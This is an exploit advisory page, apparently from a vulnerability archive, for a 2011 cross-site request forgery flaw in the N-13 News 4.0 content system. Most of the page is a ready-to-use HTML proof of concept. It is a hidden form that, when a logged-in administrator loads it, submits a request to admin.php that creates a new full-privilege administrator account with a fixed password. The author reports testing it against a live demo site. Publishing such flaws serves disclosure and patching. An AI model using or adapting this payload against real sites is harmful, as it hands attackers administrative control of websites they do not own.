N-13 News 4.0 Cross Site Request Forgery

2011.03.08
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

N-13 News 4.0 CSRF Vulnerability (Add Admin) ==================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Script : http://n-13news.googlecode.com/files/n13news4.0.1.zip .:. Tested On Demo : http://network-13.com/news/ .:. Home : http://www.sec-risk.com/vb/ #################################################################### ===[ Exploit ]=== <form method="POST" name="form0" action="http://localhost/N-13 News 4.0/admin.php?action=options&mod=accounts&create=new"> <input type="hidden" name="accountname" value="WebAdmin"/> <input type="hidden" name="accountemail" value="Example@hotmail.com"/> <input type="hidden" name="accountpassword1" value="123456"/> <input type="hidden" name="accountpassword2" value="123456"/> <input type="hidden" name="accountaccesslevel" value="1"/> <input type="hidden" name="S1" value="Save"/> </form> <form method="GET" name="form1" action="http://localhost/N-13 News 4.0/js/main.php"> <input type="hidden" name="name" value="value"/> </form> </body> </html> ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top